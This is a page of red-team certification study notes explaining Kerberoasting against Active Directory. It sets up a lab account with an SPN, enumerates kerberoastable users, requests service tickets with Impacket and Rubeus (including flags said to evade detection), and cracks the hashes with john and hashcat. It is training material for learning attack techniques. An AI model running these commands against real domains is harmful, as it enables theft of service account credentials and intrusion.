> For the complete documentation index, see [llms.txt](https://dev-angelist.gitbook.io/crtp-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dev-angelist.gitbook.io/crtp-notes/readme/network-security-5/2.1-2.md).

# 7.4 - Kerberoasting

## Kerberoasting

Kerberoasting targets **service accounts with an assigned SPN**. When a user requests access to a service, they receive a **Service Ticket (ST)** encrypted with the service account’s long-term password.

If an attacker can obtain the **ST**, they can attempt to crack the encryption offline to retrieve the service account password.

#### Kerberos Ticket Exchange for Services

```
3) TGS-REQ (Client -> KDC/TGS)
   - TGT 🔑 Encrypted with KDC key
   - Authenticator Data 🔑 Encrypted with TGS Session Key

4) TGS-REP (KDC/TGS -> Client)
   - ST 🔑 Encrypted with Service key
   - Service Session Key 🔑 Encrypted with TGS Session Key
```

Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket.

### Example: Exploiting Kerberoasting

**Step 1: Create a User with an SPN**

```powershell
New-ADUser -Name "kerberoasting" -SamAccountName "kerberoasting" -UserPrincipalName "kerberoasting@dev-angelist" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true
```

**Step 2: Assign an SPN**

```powershell
Set-ADUser -Identity "kerberoasting" -ServicePrincipalNames @{Add="HTTP/kerberoasting.dev-angelist.lab"}
```

**Step 3: Verify the SPN**

```powershell
Get-ADUser -Identity "kerberoasting" -Properties ServicePrincipalNames
setspn -L kerberoasting
```

<figure><img src="/files/Nfo6WVtd4nwuL9GYWldd" alt=""><figcaption></figcaption></figure>

**Step 4: Identify Kerberoastable Accounts**

```bash
#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Check kerberoastable users using the Impacket's module: GetUserSPNs.py
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc
#Or using AD Module and PowerView (Windows)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-DomainUser -SPN

```

<figure><img src="/files/dqVtpOgvdqRWMJve5iLI" alt=""><figcaption></figcaption></figure>

in this case there're two vulnerable users: 'kerberoasting' and 'angel'.

**Step 5: Request Service Tickets for Kerberoasting**

```powershell
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request #without specifing a user it checks all possible tickets
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt
```

or using Rubeus:

<pre class="language-powershell"><code class="lang-powershell"><strong>#View statistics on Kerberoastable accounts:
</strong>Rubeus.exe kerberoast /stats
#Request a TGS for a specific user:
Rubeus.exe kerberoast /user:svcadmin /simple
#To avoid detection (e.g., MDI logging downgrade attacks), target accounts restricted to RC4:
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
#Kerberoast all RC4-only accounts and output to file:
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
</code></pre>

<figure><img src="/files/a6oNIB0D8SyKme7qYWp1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OeThg7u5HUqXjg4UaPRc" alt=""><figcaption></figcaption></figure>

**Step 6: Crack the Service Ticket**

```bash
john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt
hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt
#john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt
```

<figure><img src="/files/xrca4dr3gucMCxztO4nO" alt=""><figcaption></figcaption></figure>

#### Troubleshooting: Clock Skew Errors

If you encounter `KRB_AP_ERR_SKEW (Clock skew too great)`, synchronize the clocks with:

```bash
sudo timedatectl set-ntp off
ntpdate -q corp-dc
ntpdate -u corp-dc
```

***

## Other Resources

* [Kerberos Authentication Hexdump YT](https://www.youtube.com/watch?v=dQz3CMlVYNY\&list=PLJnLaWkc9xRi71Pso26JlvyBkLUOETLjn)
* [Roasting attacks Hexdump YT](https://www.youtube.com/watch?v=fVTZEIZIEqg)

### Labs

* [Learning Object 15 lab](/crtp-notes/readme/lab/15-lo1-5.md)
